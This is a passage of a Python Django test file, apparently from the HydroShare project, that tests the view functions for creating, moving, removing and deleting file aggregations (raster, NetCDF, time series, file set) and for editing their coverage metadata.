| 0.027397
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3cba330c0b4fb63a472a308d1547372d2b8779a
| 93,518
|
py
|
Python
|
hs_file_types/tests/test_view_functions.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | null | null | null |
hs_file_types/tests/test_view_functions.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | null | null | null |
hs_file_types/tests/test_view_functions.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | null | null | null |
import json
from django.test import TestCase, RequestFactory
from django.contrib.auth.models import Group
from django.core.urlresolvers import reverse
from rest_framework import status
from hs_core import hydroshare
from hs_core.models import ResourceFile
from hs_core.testing import MockIRODSTestCaseMixin
from hs_file_types.views import set_file_type, add_metadata_element, update_metadata_element, \
update_key_value_metadata, delete_key_value_metadata, add_keyword_metadata, \
delete_keyword_metadata, update_netcdf_file, update_dataset_name, update_refts_abstract, \
update_sqlite_file, update_timeseries_abstract, get_timeseries_metadata, remove_aggregation, \
delete_coverage_element, update_aggregation_coverage, move_aggregation, delete_aggregation
from hs_file_types.models import GeoRasterLogicalFile, NetCDFLogicalFile, NetCDFFileMetaData, \
RefTimeseriesLogicalFile, TimeSeriesLogicalFile, GenericLogicalFile, FileSetLogicalFile
from hs_file_types.tests.utils import CompositeResourceTestMixin
class TestFileTypeViewFunctions(MockIRODSTestCaseMixin, TestCase, CompositeResourceTestMixin):
def setUp(self):
super(TestFileTypeViewFunctions, self).setUp()
self.group, _ = Group.objects.get_or_create(name='Hydroshare Author')
self.username = 'john'
self.password = 'jhmypassword'
self.user = hydroshare.create_account(
'john@gmail.com',
username=self.username,
first_name='John',
last_name='Clarson',
superuser=False,
password=self.password,
groups=[]
)
self.res_title = 'Test Raster File Type'
self.factory = RequestFactory()
self.raster_file_name = 'small_logan.tif'
self.raster_file = 'hs_file_types/tests/{}'.format(self.raster_file_name)
self.netcdf_file_name = 'netcdf_valid.nc'
self.netcdf_file = 'hs_file_types/tests/{}'.format(self.netcdf_file_name)
self.refts_file_name = 'multi_sites_formatted_version1.0.refts.json'
self.refts_file = 'hs_file_types/tests/{}'.format(self.refts_file_name)
missing_title_refts_json_file = 'refts_valid_title_null.refts.json'
self.refts_missing_title_file_name = missing_title_refts_json_file
self.refts_missing_title_file = 'hs_file_types/tests/{}'.format(
self.refts_missing_title_file_name)
self.sqlite_file_name = 'ODM2_Multi_Site_One_Variable.sqlite'
self.sqlite_file = 'hs_file_types/tests/data/{}'.format(self.sqlite_file_name)
self.text_file_name = 'generic_file.txt'
self.text_file = 'hs_file_types/tests/{}'.format(self.text_file_name)
def test_create_raster_aggregation_from_file(self):
# here we are using a valid raster tif file for setting it
# to Geo Raster file type which includes metadata extraction
self.create_composite_resource(file_to_upload=self.raster_file)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# check that the resource file is not associated with any logical file
self.assertEqual(res_file.has_logical_file, False)
url_params = {'resource_id': self.composite_resource.short_id,
'file_id': res_file.id,
'hs_file_type': 'GeoRaster'
}
url = reverse('set_file_type', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = set_file_type(request, resource_id=self.composite_resource.short_id,
file_id=res_file.id, hs_file_type='GeoRaster')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# there should be 2 file now (vrt file was generated by the system
self.assertEqual(self.composite_resource.files.all().count(), 2)
res_file = self.composite_resource.files.first()
self.assertEqual(res_file.logical_file_type_name, "GeoRasterLogicalFile")
self.composite_resource.delete()
def test_create_raster_aggregation_from_folder(self):
# here we are using a folder that contains a valid raster tif file for setting it (folder)
# to Geo Raster file type which includes metadata extraction
self.create_composite_resource()
# create a folder to place the raster file
new_folder = 'raster_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the tif file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.raster_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
self.assertNotEqual(res_file.file_folder, None)
# check that the resource file is not associated with any logical file
self.assertEqual(res_file.has_logical_file, False)
url_params = {'resource_id': self.composite_resource.short_id,
'hs_file_type': 'GeoRaster'
}
post_data = {'folder_path': res_file.file_folder}
url = reverse('set_file_type', kwargs=url_params)
request = self.factory.post(url, data=post_data)
request.user = self.user
# this is the view function we are testing
response = set_file_type(request, resource_id=self.composite_resource.short_id,
file_id=res_file.id, hs_file_type='GeoRaster')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# there should be 2 file now (vrt file was generated by the system
self.assertEqual(self.composite_resource.files.all().count(), 2)
res_file = self.composite_resource.files.first()
self.assertEqual(res_file.logical_file_type_name, "GeoRasterLogicalFile")
self.composite_resource.delete()
def test_create_netcdf_aggregation_from_file(self):
# here we are using a valid netcdf file for setting it
# to NetCDF file type which includes metadata extraction
self.create_composite_resource(file_to_upload=self.netcdf_file)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# check that the resource file is not associated with any logical file
self.assertEqual(res_file.has_logical_file, False)
url_params = {'resource_id': self.composite_resource.short_id,
'file_id': res_file.id,
'hs_file_type': 'NetCDF'
}
url = reverse('set_file_type', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = set_file_type(request, resource_id=self.composite_resource.short_id,
file_id=res_file.id, hs_file_type='NetCDF')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# there should be 2 file now (vrt file was generated by the system
self.assertEqual(self.composite_resource.files.all().count(), 2)
res_file = self.composite_resource.files.first()
self.assertEqual(res_file.logical_file_type_name, "NetCDFLogicalFile")
self.composite_resource.delete()
def test_create_netcdf_aggregation_from_folder(self):
# here we are using a folder that contains a valid netcdf file for setting it
# to NetCDF file type which includes metadata extraction
self.create_composite_resource()
# create a folder to place the nc file
new_folder = 'netcdf_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the tif file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# check that the resource file is not associated with any logical file
self.assertEqual(res_file.has_logical_file, False)
url_params = {'resource_id': self.composite_resource.short_id,
'hs_file_type': 'NetCDF'
}
post_data = {'folder_path': res_file.file_folder}
url = reverse('set_file_type', kwargs=url_params)
request = self.factory.post(url, data=post_data)
request.user = self.user
# this is the view function we are testing
response = set_file_type(request, resource_id=self.composite_resource.short_id,
file_id=res_file.id, hs_file_type='NetCDF')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# there should be 2 file now (vrt file was generated by the system
self.assertEqual(self.composite_resource.files.all().count(), 2)
res_file = self.composite_resource.files.first()
self.assertEqual(res_file.logical_file_type_name, "NetCDFLogicalFile")
self.composite_resource.delete()
def test_create_timeseries_aggregation_from_file(self):
# here we are using a valid sqlite file for setting it
# to TimeSeries file type which includes metadata extraction
self.create_composite_resource(file_to_upload=self.sqlite_file)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# check that the resource file is not associated with any logical file
self.assertEqual(res_file.has_logical_file, False)
url_params = {'resource_id': self.composite_resource.short_id,
'file_id': res_file.id,
'hs_file_type': 'TimeSeries'
}
url = reverse('set_file_type', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = set_file_type(request, resource_id=self.composite_resource.short_id,
file_id=res_file.id, hs_file_type='TimeSeries')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# there should be still 1 file now (sqlite file)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
self.assertEqual(res_file.logical_file_type_name, "TimeSeriesLogicalFile")
self.composite_resource.delete()
def test_create_timeseries_aggregation_from_folder(self):
# here we are using a folder that contains a valid sqlite file for setting it
# to TimeSeries file type which includes metadata extraction
self.create_composite_resource()
# create a folder to place the nc file
new_folder = 'timeseries_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the tif file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.sqlite_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# check that the resource file is not associated with any logical file
self.assertEqual(res_file.has_logical_file, False)
url_params = {'resource_id': self.composite_resource.short_id,
'hs_file_type': 'TimeSeries'
}
post_data = {'folder_path': res_file.file_folder}
url = reverse('set_file_type', kwargs=url_params)
request = self.factory.post(url, data=post_data)
request.user = self.user
# this is the view function we are testing
response = set_file_type(request, resource_id=self.composite_resource.short_id,
file_id=res_file.id, hs_file_type='TimeSeries')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# there should be still 1 file now (sqlite file)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
self.assertEqual(res_file.logical_file_type_name, "TimeSeriesLogicalFile")
self.composite_resource.delete()
def test_create_fileset_aggregation(self):
"""Here we are testing creating a file set aggregation"""
self.create_composite_resource()
# create a folder and put a file in that folder
new_folder = 'fileset_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the text file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.text_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# check that the resource file is not associated with any logical file
self.assertEqual(res_file.has_logical_file, False)
url_params = {'resource_id': self.composite_resource.short_id,
'hs_file_type': 'FileSet'
}
post_data = {'folder_path': res_file.file_folder}
url = reverse('set_file_type', kwargs=url_params)
request = self.factory.post(url, data=post_data)
request.user = self.user
# this is the view function we are testing
response = set_file_type(request, resource_id=self.composite_resource.short_id,
hs_file_type='FileSet')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# there should be still 1 file now
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
self.assertEqual(res_file.logical_file_type_name, "FileSetLogicalFile")
self.composite_resource.delete()
def test_remove_aggregation(self):
# here we are testing the remove_aggregation view function
self.create_composite_resource()
new_folder = 'my_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the nc file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
expected_file_folder = res_file.file_folder
# set the nc file to NetCDFLogicalFile (aggregation)
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
# test that we have one logical file of type NetCDFLogicalFile
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
logical_file = NetCDFLogicalFile.objects.first()
self.assertEqual(logical_file.files.all().count(), 2)
self.assertEqual(self.composite_resource.files.all().count(), 2)
url_params = {'resource_id': self.composite_resource.short_id,
'file_type_id': logical_file.id,
'hs_file_type': 'NetCDFLogicalFile'
}
url = reverse('remove_aggregation', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = remove_aggregation(request, resource_id=self.composite_resource.short_id,
file_type_id=logical_file.id,
hs_file_type='NetCDFLogicalFile')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# test there is no NetCDFLogicalFile object
self.assertEqual(NetCDFLogicalFile.objects.count(), 0)
# test there is no NetCDFFileMetaData object
self.assertEqual(NetCDFFileMetaData.objects.count(), 0)
# check the files associated with the aggregation not deleted
self.assertEqual(self.composite_resource.files.all().count(), 2)
# check the file folder is not deleted
for f in self.composite_resource.files.all():
self.assertEqual(f.file_folder, expected_file_folder)
self.composite_resource.delete()
def test_delete_aggregation(self):
# here we are testing the delete_aggregation view function
self.create_composite_resource()
# new_folder = 'my_folder'
# ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the nc file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.netcdf_file)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# set the nc file to NetCDFLogicalFile (aggregation)
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
# test that we have one logical file of type NetCDFLogicalFile
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
logical_file = NetCDFLogicalFile.objects.first()
self.assertEqual(logical_file.files.all().count(), 2)
self.assertEqual(self.composite_resource.files.all().count(), 2)
url_params = {'resource_id': self.composite_resource.short_id,
'file_type_id': logical_file.id,
'hs_file_type': 'NetCDFLogicalFile'
}
url = reverse('delete_aggregation', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = delete_aggregation(request, resource_id=self.composite_resource.short_id,
file_type_id=logical_file.id,
hs_file_type='NetCDFLogicalFile')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# test there is no NetCDFLogicalFile object
self.assertEqual(NetCDFLogicalFile.objects.count(), 0)
# test there is no NetCDFFileMetaData object
self.assertEqual(NetCDFFileMetaData.objects.count(), 0)
# check the files are deleted
self.assertEqual(self.composite_resource.files.all().count(), 0)
self.composite_resource.delete()
def test_move_aggregation(self):
# here we are testing the move_aggregation view function
self.create_composite_resource()
new_folder = 'my_folder'
tgt_folder = 'moved_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
ResourceFile.create_folder(self.composite_resource, tgt_folder)
# add the the nc file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# set the nc file to NetCDFLogicalFile (aggregation)
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
# test that we have one logical file of type NetCDFLogicalFile
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
logical_file = NetCDFLogicalFile.objects.first()
self.assertEqual(logical_file.files.all().count(), 2)
self.assertEqual(self.composite_resource.files.all().count(), 2)
url_params = {'resource_id': self.composite_resource.short_id,
'file_type_id': logical_file.id,
'hs_file_type': 'NetCDFLogicalFile',
'tgt_path': tgt_folder
}
url = reverse('move_aggregation', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = move_aggregation(request, resource_id=self.composite_resource.short_id,
file_type_id=logical_file.id,
hs_file_type='NetCDFLogicalFile', tgt_path=tgt_folder)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# test there is no NetCDFLogicalFile object
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
# test there is no NetCDFFileMetaData object
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
# check the files associated with the aggregation not deleted
self.assertEqual(self.composite_resource.files.all().count(), 2)
# check the file folder is now tgt_folder
for f in self.composite_resource.files.all():
self.assertEqual(f.file_folder, tgt_folder)
self.composite_resource.delete()
def test_move_aggregation_nested(self):
# here we are testing the move_aggregation view function
self.create_composite_resource()
new_folder = 'my_folder'
tgt_folder = 'my_folder/moved_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
ResourceFile.create_folder(self.composite_resource, tgt_folder)
# add the the nc file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# set the nc file to NetCDFLogicalFile (aggregation)
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
# test that we have one logical file of type NetCDFLogicalFile
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
logical_file = NetCDFLogicalFile.objects.first()
self.assertEqual(logical_file.files.all().count(), 2)
self.assertEqual(self.composite_resource.files.all().count(), 2)
url_params = {'resource_id': self.composite_resource.short_id,
'file_type_id': logical_file.id,
'hs_file_type': 'NetCDFLogicalFile',
'tgt_path': tgt_folder
}
url = reverse('move_aggregation', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = move_aggregation(request, resource_id=self.composite_resource.short_id,
file_type_id=logical_file.id,
hs_file_type='NetCDFLogicalFile', tgt_path=tgt_folder)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# test there is no NetCDFLogicalFile object
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
# test there is no NetCDFFileMetaData object
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
# check the files associated with the aggregation not deleted
self.assertEqual(self.composite_resource.files.all().count(), 2)
# check the file folder is now tgt_folder
for f in self.composite_resource.files.all():
self.assertEqual(f.file_folder, tgt_folder)
self.composite_resource.delete()
def test_move_aggregation_root(self):
# here we are testing the move_aggregation view function
self.create_composite_resource()
new_folder = ''
tgt_folder = 'moved_folder'
# ResourceFile.create_folder(self.composite_resource, new_folder)
ResourceFile.create_folder(self.composite_resource, tgt_folder)
# add the the nc file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# set the nc file to NetCDFLogicalFile (aggregation)
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
# test that we have one logical file of type NetCDFLogicalFile
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
logical_file = NetCDFLogicalFile.objects.first()
self.assertEqual(logical_file.files.all().count(), 2)
self.assertEqual(self.composite_resource.files.all().count(), 2)
url_params = {'resource_id': self.composite_resource.short_id,
'file_type_id': logical_file.id,
'hs_file_type': 'NetCDFLogicalFile',
'tgt_path': tgt_folder
}
url = reverse('move_aggregation', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = move_aggregation(request, resource_id=self.composite_resource.short_id,
file_type_id=logical_file.id,
hs_file_type='NetCDFLogicalFile', tgt_path=tgt_folder)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# test there is no NetCDFLogicalFile object
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
# test there is no NetCDFFileMetaData object
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
# check the files associated with the aggregation not deleted
self.assertEqual(self.composite_resource.files.all().count(), 2)
# check the file folder is now tgt_folder
for f in self.composite_resource.files.all():
self.assertEqual(f.file_folder, tgt_folder)
self.composite_resource.delete()
def test_move_aggregation_to_root(self):
# here we are testing the move_aggregation view function
self.create_composite_resource()
new_folder = 'new_folder'
# ResourceFile.create_folder(self.composite_resource, new_folder)
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the nc file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.netcdf_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# set the nc file to NetCDFLogicalFile (aggregation)
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
# test that we have one logical file of type NetCDFLogicalFile
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
logical_file = NetCDFLogicalFile.objects.first()
self.assertEqual(logical_file.files.all().count(), 2)
self.assertEqual(self.composite_resource.files.all().count(), 2)
url_params = {'resource_id': self.composite_resource.short_id,
'file_type_id': logical_file.id,
'hs_file_type': 'NetCDFLogicalFile'
}
url = reverse('move_aggregation', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = move_aggregation(request, resource_id=self.composite_resource.short_id,
file_type_id=logical_file.id,
hs_file_type='NetCDFLogicalFile')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# test there is no NetCDFLogicalFile object
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
# test there is no NetCDFFileMetaData object
self.assertEqual(NetCDFFileMetaData.objects.count(), 1)
# check the files associated with the aggregation not deleted
self.assertEqual(self.composite_resource.files.all().count(), 2)
# check the file folder is now tgt_folder
for f in self.composite_resource.files.all():
self.assertEqual(f.file_folder, None)
self.composite_resource.delete()
def test_add_update_single_file_aggregation_metadata(self):
# here we are testing 'add_metadata_element' view function for updating metadata
# for a single file aggregation
self.create_composite_resource(file_to_upload=self.text_file)
res_file = self.composite_resource.files.first()
# set the text file to GenericLogicalFile (single file) aggregation type
GenericLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "GenericLogicalFile")
# no temporal coverage for the single file type yet
self.assertEqual(logical_file.metadata.temporal_coverage, None)
# add temporal coverage
url_params = {'hs_file_type': 'GenericLogicalFile',
'file_type_id': logical_file.id,
'element_name': 'coverage'
}
url = reverse('add_file_metadata', kwargs=url_params)
request = self.factory.post(url, data={'start': '1/1/2010', 'end': '12/12/2015'})
request.user = self.user
# this is the view function we are testing
response = add_metadata_element(request, hs_file_type="GenericLogicalFile",
file_type_id=logical_file.id, element_name='coverage')
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# now the single file aggregation should have temporal coverage element
self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
# test updating temporal coverage
url_params['element_id'] = logical_file.metadata.temporal_coverage.id
url = reverse('update_file_metadata', kwargs=url_params)
request = self.factory.post(url, data={'start': '1/1/2011', 'end': '12/12/2016'})
request.user = self.user
# this is the view function we are testing
response = update_metadata_element(request, hs_file_type="GenericLogicalFile",
file_type_id=logical_file.id, element_name='coverage',
element_id=logical_file.metadata.temporal_coverage.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
temporal_coverage = logical_file.metadata.temporal_coverage
self.assertEqual(temporal_coverage.value['start'], '2011-01-01')
self.assertEqual(temporal_coverage.value['end'], '2016-12-12')
self.composite_resource.delete()
def test_add_update_file_set_aggregation_metadata(self):
# here we are testing 'add_metadata_element' view function for updating metadata
# for a file set aggregation
self.create_composite_resource()
# create a folder and put a file in that folder
new_folder = 'fileset_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the text file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.text_file, upload_folder=new_folder)
self.assertEqual(self.composite_resource.files.all().count(), 1)
# no file set aggregation at this point
self.assertEqual(FileSetLogicalFile.objects.count(), 0)
# set the folder to file set aggregation type
FileSetLogicalFile.set_file_type(self.composite_resource, self.user, folder_path=new_folder)
# there should be one file set aggregation
self.assertEqual(FileSetLogicalFile.objects.count(), 1)
logical_file = FileSetLogicalFile.objects.first()
# no temporal coverage for the file set file type yet
self.assertEqual(logical_file.metadata.temporal_coverage, None)
# add temporal coverage
url_params = {'hs_file_type': 'FileSetLogicalFile',
'file_type_id': logical_file.id,
'element_name': 'coverage'
}
url = reverse('add_file_metadata', kwargs=url_params)
request = self.factory.post(url, data={'start': '1/1/2010', 'end': '12/12/2015'})
request.user = self.user
# this is the view function we are testing
response = add_metadata_element(request, hs_file_type="FileSetLogicalFile",
file_type_id=logical_file.id, element_name='coverage')
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# now the single file aggregation should have temporal coverage element
self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
# test updating temporal coverage
url_params['element_id'] = logical_file.metadata.temporal_coverage.id
url = reverse('update_file_metadata', kwargs=url_params)
request = self.factory.post(url, data={'start': '1/1/2011', 'end': '12/12/2016'})
request.user = self.user
# this is the view function we are testing
response = update_metadata_element(request, hs_file_type="FileSetLogicalFile",
file_type_id=logical_file.id, element_name='coverage',
element_id=logical_file.metadata.temporal_coverage.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
temporal_coverage = logical_file.metadata.temporal_coverage
self.assertEqual(temporal_coverage.value['start'], '2011-01-01')
self.assertEqual(temporal_coverage.value['end'], '2016-12-12')
self.composite_resource.delete()
def test_delete_single_file_aggregation_coverage(self):
"""Here we are testing deleting temporal and spatial coverage for a single file
aggregation"""
self.create_composite_resource(file_to_upload=self.text_file)
res_file = self.composite_resource.files.first()
# set the text file to GenericLogicalFile (single file) aggregation type
GenericLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
self._test_delete_aggregation_coverage(file_type="GenericLogicalFile")
def test_delete_file_set_aggregation_coverage(self):
"""Here we are testing deleting temporal and spatial coverage for a file set
aggregation"""
self.create_composite_resource()
new_folder = 'fileset_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the text file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.text_file, upload_folder=new_folder)
# set the folder to file set aggregation type
FileSetLogicalFile.set_file_type(self.composite_resource, self.user, folder_path=new_folder)
self._test_delete_aggregation_coverage(file_type="FileSetLogicalFile")
def _test_delete_aggregation_coverage(self, file_type):
"""helper to test delete of coverage for either single file or file set aggregation"""
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
# test deleting spatial coverage
self.assertEqual(logical_file.metadata.spatial_coverage, None)
value_dict = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'}
logical_file.metadata.create_element('coverage', type='point', value=value_dict)
self.assertNotEqual(logical_file.metadata.spatial_coverage, None)
self.assertTrue(logical_file.metadata.is_dirty)
logical_file.metadata.is_dirty = False
logical_file.metadata.save()
self.assertNotEqual(logical_file.metadata.spatial_coverage, None)
url_params = {'hs_file_type': file_type,
'file_type_id': logical_file.id,
'element_id': logical_file.metadata.spatial_coverage.id
}
url = reverse('delete_file_coverage', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = delete_coverage_element(request, hs_file_type=file_type,
file_type_id=logical_file.id,
element_id=logical_file.metadata.spatial_coverage.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
self.assertEqual(logical_file.metadata.spatial_coverage, None)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertTrue(logical_file.metadata.is_dirty)
# test deleting temporal coverage
self.assertEqual(logical_file.metadata.temporal_coverage, None)
value_dict = {'name': 'Name for period coverage', 'start': '1/1/2000', 'end': '12/12/2012'}
logical_file.metadata.create_element('coverage', type='period', value=value_dict)
self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
self.assertTrue(logical_file.metadata.is_dirty)
logical_file.metadata.is_dirty = False
logical_file.metadata.save()
self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
url_params = {'hs_file_type': file_type,
'file_type_id': logical_file.id,
'element_id': logical_file.metadata.temporal_coverage.id
}
url = reverse('delete_file_coverage', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing
response = delete_coverage_element(request, hs_file_type=file_type,
file_type_id=logical_file.id,
element_id=logical_file.metadata.temporal_coverage.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
self.assertEqual(logical_file.metadata.temporal_coverage, None)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertTrue(logical_file.metadata.is_dirty)
self.composite_resource.delete()
def test_add_update_raster_aggregation_metadata(self):
# here we are testing 'add_metadata_element' view function for updating metadata
# for raster aggregation
self.create_composite_resource(file_to_upload=self.raster_file)
res_file = self.composite_resource.files.first()
# set the tif file to GeoRasterFile type
GeoRasterLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "GeoRasterLogicalFile")
# no temporal coverage for the raster file type yet
self.assertEqual(logical_file.metadata.temporal_coverage, None)
# add temporal coverage
url_params = {'hs_file_type': 'GeoRasterLogicalFile',
'file_type_id': logical_file.id,
'element_name': 'coverage'
}
url = reverse('add_file_metadata', kwargs=url_params)
request = self.factory.post(url, data={'start': '1/1/2010', 'end': '12/12/2015'})
request.user = self.user
# this is the view function we are testing
response = add_metadata_element(request, hs_file_type="GeoRasterLogicalFile",
file_type_id=logical_file.id, element_name='coverage')
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# now the raster file should have temporal coverage element
self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
# test updating temporal coverage
url_params['element_id'] = logical_file.metadata.temporal_coverage.id
url = reverse('update_file_metadata', kwargs=url_params)
request = self.factory.post(url, data={'start': '1/1/2011', 'end': '12/12/2016'})
request.user = self.user
# this is the view function we are testing
response = update_metadata_element(request, hs_file_type="GeoRasterLogicalFile",
file_type_id=logical_file.id, element_name='coverage',
element_id=logical_file.metadata.temporal_coverage.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
temporal_coverage = logical_file.metadata.temporal_coverage
self.assertEqual(temporal_coverage.value['start'], '2011-01-01')
self.assertEqual(temporal_coverage.value['end'], '2016-12-12')
self.composite_resource.delete()
def test_add_update_netcdf_aggregation_metadata(self):
